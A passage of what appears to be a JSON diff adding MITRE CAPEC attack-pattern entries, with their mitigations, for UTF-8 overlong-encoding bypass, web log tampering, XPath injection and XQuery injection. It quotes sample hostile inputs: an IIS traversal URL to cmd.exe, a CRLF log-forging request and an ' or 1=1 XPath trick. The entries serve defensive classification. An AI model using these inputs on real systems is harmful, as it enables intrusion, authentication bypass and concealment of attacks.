"http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-112", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html" + }, + { + "description": "Michael Howard, David LeBlanc, Writing Secure Code, Microsoft Press", + "external_id": "REF-530", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Bruce Schneier, Security Risks of Unicode, Crypto-Gram Newsletter, 2000--07---15", + "external_id": "REF-531", + "source_name": "reference_from_CAPEC", + "url": "https://www.schneier.com/crypto-gram/archives/2000/0715.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-532", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/UTF-8" + }, + { + "description": "F. 
Yergeau, RFC 3629 - UTF-8, a transformation format of ISO 10646, 2003--11", + "external_id": "REF-533", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc3629.html" + }, + { + "description": "Eric Hacker, IDS Evasion with Unicode, 2001--01---03", + "external_id": "REF-114", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/infocus/1232" + }, + { + "description": "Corrigendum #1: UTF-8 Shortest Form, The Unicode Standard, 2001--03, Unicode, Inc.", + "external_id": "REF-535", + "source_name": "reference_from_CAPEC", + "url": "http://www.unicode.org/versions/corrigendum1.html" + }, + { + "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04", + "external_id": "REF-525", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html" + }, + { + "description": "Markus Kuhn, UTF-8 decoder capability and stress test, 2003--02---19", + "external_id": "REF-537", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/%7Emgk25/ucs/examples/UTF-8-test.txt" + } + ], + "id": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using UTF-8 Encoding to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify 
Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this\n http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe\n the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.\n So when the attacker requested the tainted URL, they accessed\n http://servername/scripts/../../winnt/system32/cmd.exe\n In other words, they walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where they could pass commands to the command shell, Cmd.exe.See also: CVE-2000-0884" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe entry points to locate vulnerabilities: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines.
    Try to use UTF-8 encoding of content in HTML in order to bypass validation routines.
    Try to use UTF-8 encoding of content in CSS in order to bypass validation routines.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770" + ], + "x_capec_prerequisites": [ + "The application's UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.", + "Input filtering and validating is not done properly leaving the door open to harmful characters for the target host." + ], + "x_capec_skills_required": { + "Low": "An attacker can inject different representation of a filtered character in UTF-8 format.", + "Medium": "An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The Unicode Consortium recognized multiple representations to be a problem and has revised the Unicode Standard to make multiple representations of the same code point with UTF-8 illegal. The UTF-8 Corrigendum lists the newly restricted UTF-8 range (See references). Many current applications may not have been revised to follow this rule. Verify that your application conform to the latest UTF-8 encoding specification. 
Pay extra attention to the filtering of illegal characters.", + "id": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04696e3f-623a-46fd-bd0e-c253d001cba3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:\n \n 1. Insert a replacement character (e.g. '?', '').\n 2. Ignore the bytes.\n 3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).\n 4. Not notice and decode as if the bytes were some similar bit of UTF-8.\n 5. Stop decoding and report an error (possibly giving the caller the option to continue).\n \n It is possible for a decoder to behave in different ways for different types of invalid input.\n RFC 3629 only requires that UTF-8 decoders must not decode \"overlong sequences\" (where a character is encoded in more bytes than needed but still adheres to the forms above). 
The Unicode Standard requires a Unicode-compliant decoder to \"...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence.\"\n Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft's IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.\n To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.\n Another consideration is error recovery. 
To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position.\n ", + "id": "course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cdd3394b-f883-47bf-a85c-0a79d48872bf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For security reasons, a UTF-8 decoder must not accept UTF-8 sequences that are longer than necessary to encode a character. 
If you use a parser to decode the UTF-8 encoding, make sure that parser filter the invalid UTF-8 characters (invalid forms or overlong forms).", + "id": "course-of-action--2984b19d-0e72-4ebb-abaa-04953b80dbe3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9116b922-43a0-4491-8306-52e2c12b1dbf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2984b19d-0e72-4ebb-abaa-04953b80dbe3", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Look for overlong UTF-8 sequences starting with malicious pattern. 
You can also use a UTF-8 decoder stress test to test your UTF-8 parser (See Markus Kuhn's UTF-8 and Unicode FAQ in reference section)", + "id": "course-of-action--d9b22e6b-a3b6-4d0c-9522-c3b147e28de5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9ec596d0-6f5a-467d-b542-5bcad89fb1d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9b22e6b-a3b6-4d0c-9522-c3b147e28de5", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee809e72-9489-47d3-8a97-15d2e21d67a6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. 
Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \"Log Injection-Tampering-Forging\" except that in this case, the attack is targeting the logs of the web server and not the application.", + "external_references": [ + { + "external_id": "CAPEC-81", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/81.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/279.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Server Logs Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application Web Server Log File Format: The attacker observes the system and looks for indicators of which logging utility is being used by the web server.

  2. Techniques
    Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.

Experiment

  1. Determine Injectable Content: The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.

  2. Techniques
    Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

  2. Techniques
    \n Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    Directly through log file or database manipulation, modify existing log entries.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Target server software must be a HTTP server that performs web logging." + ], + "x_capec_resources_required": [ + "Ability to send specially formatted HTTP request to web server" + ], + "x_capec_skills_required": { + "Low": "To input faked entries into Web logs" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use input validation before writing to web log", + "id": "course-of-action--edac5c2c-7cfe-4047-b2f5-d1626f5c468b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-81-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abbb4499-f5b6-4bd9-9b82-f6302c635ae9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--edac5c2c-7cfe-4047-b2f5-d1626f5c468b", + "spec_version": "2.1", + "target_ref": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Validate all log data before it is output", + "id": "course-of-action--bc74e6ff-c1ac-4157-97f0-a457258b1503", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-81-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c13cda6-424c-4bee-a156-88983f9443e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bc74e6ff-c1ac-4157-97f0-a457258b1503", + "spec_version": "2.1", + "target_ref": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads, CAPEC-231: XML Oversized Payloads, and CAPEC-147: XML Ping of Death. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-82", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/82.html" + } + ], + "id": "attack-pattern--498a90d8-abbe-4fa9-8b19-549daa1c24ee", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: Violating Implicit Assumptions Regarding XML Content (aka XML Denial of Service (XDoS))", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that they normally would not be able to. 
XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.", + "external_references": [ + { + "external_id": "CAPEC-83", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/83.html" + }, + { + "external_id": "CWE-91", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/91.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "XPath Injection", + "external_id": "39", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XPath-Injection" + }, + { + "description": "Blind XPath Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Blind_XPath_Injection" + }, + { + "description": "XPATH Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/XPATH_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-611", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.html" + } + ], + "id": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XPath Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + 
"x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an adversary records all instances of user-controllable input used to contruct XPath queries.

  2. Techniques
    Use an automated tool to record all instances of user-controllable input used to contruct XPath queries.
    Use a browser to manually explore the website and analyze how the application processes inputs.
  3. Determine the tructure of queries: Using manual or automated means, test inputs found for XPath weaknesses.

  4. Techniques
    Use an automated tool automatically probe the inputs for XPath weaknesses.
    Manually probe the inputs using characters such as single quote (') that can cause XPath-releated errors, thus indicating an XPath weakness.

Exploit

  1. Inject content into XPath query: Craft malicious content containing XPath expressions that is not validated by the application and is executed as part of the XPath queries.

  2. Techniques
    Use the crafted input to execute unexpected queries that can disclose sensitive database information to the attacker.
    Use a combination of single quote (') and boolean expressions such as \"or 1=1\" to manipulate XPath logic.
    Use XPath functions in the malicious content such as \"string-length\", \"substring\", or \"count\" to gain information about the XML document structure being used.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "XPath queries used to retrieve information stored in XML documents", + "User-controllable input not properly sanitized before being used as part of XPath queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XPath expression. Characters such as a single-quote(') or operators such as or (|), and (&) and such should be filtered if the application does not expect them in the context in which they appear. 
If such content cannot be filtered, it must at least be properly escaped to avoid them being interpreted as part of XPath expressions.", + "id": "course-of-action--cab581d6-2ed4-47e6-85b3-5d84bd943c50", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-83-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d639463-ea08-4233-a922-f74423845236", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cab581d6-2ed4-47e6-85b3-5d84bd943c50", + "spec_version": "2.1", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of parameterized XPath queries - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails.", + "id": "course-of-action--9c926763-b5fb-45a5-91de-9aee1b9d874e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-83-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--edff9072-fa08-4afe-a489-21b0eafd515a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--9c926763-b5fb-45a5-91de-9aee1b9d874e", + "spec_version": "2.1", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--221561aa-fdbc-4618-ad52-cff378722a38", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--618c2d85-ca76-40a0-a019-0ac9ba1b0989", + "spec_version": "2.1", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. 
XQuery injection can be used to enumerate elements on the victim's environment, inject commands to the local host, or execute queries to remote files and data sources.", + "external_references": [ + { + "external_id": "CAPEC-84", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/84.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "XQuery Injection", + "external_id": "46", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XQuery-Injection" + } + ], + "id": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XQuery Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read 